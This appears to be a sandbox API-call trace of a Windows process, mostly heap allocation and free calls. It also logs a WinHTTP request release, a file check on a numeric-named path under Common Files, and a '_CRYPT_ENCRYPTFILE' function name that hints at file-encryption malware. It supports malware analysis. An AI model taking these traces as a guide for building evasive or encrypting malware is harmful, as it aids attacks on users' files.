[0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2520 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de948 | out: hHeap=0x8a0000) returned 1 [0244.149] WinHttpRequest:IUnknown:Release (This=0x8e7738) returned 0x0 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7f8 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddf48 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba660 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5e8 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba690 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5a0 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba480 | out: hHeap=0x8a0000) returned 1 [0244.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3a8 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba600 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8d0 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc784d0 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f68 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7e60 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed18 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e890 | out: hHeap=0x8a0000) returned 1 [0244.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ce8 | out: hHeap=0x8a0000) returned 1 [0244.152] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0244.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1950 [0244.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e890 [0244.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ce8 [0244.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1820 [0244.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba600 [0244.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16) returned 0xbd0e50 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1820 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2540 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed18 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0xc59d00 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0xa3e4d0 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ec78 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0244.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ea98 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9d60 [0244.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed18 | out: hHeap=0x8a0000) returned 1 [0244.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed18 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ea48 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3a8 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba480 [0244.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1830 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0244.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0244.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0244.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba660 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba030 [0244.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18d0 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0244.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1920 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0244.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0244.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ea48 | out: hHeap=0x8a0000) returned 1 [0244.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0244.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0244.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3a8 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba480 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2520 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5a0 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba690 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5e8 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba660 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed18 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba600 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ce8 | out: hHeap=0x8a0000) returned 1 [0244.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e890 | out: hHeap=0x8a0000) returned 1 [0244.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e890 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ce8 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1950 [0244.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ce8 | out: hHeap=0x8a0000) returned 1 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed18 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ce8 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba600 [0244.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.158] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2540 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ea48 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a80 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18d0 [0244.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0fb8 [0244.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.159] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370")) returned 0xffffffff [0244.159] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x87f800 | out: lpFindFileData=0x87f800*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x7e8b71, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7738e36c, ftLastAccessTime.dwHighDateTime=0x7738e0d2, ftLastWriteTime.dwLowDateTime=0x9bc9d0, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x9bf348, cFileName="沯\x04\x02", cAlternateFileName="")) returned 0xffffffff [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0fb8 | out: hHeap=0x8a0000) returned 1 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ea48 | out: hHeap=0x8a0000) returned 1 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0xc42318 [0244.160] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2540 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.160] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ea48 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2540 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfd0 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0244.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18d0 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0fb8 [0244.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e17c0 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18d0 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0244.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0e20 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 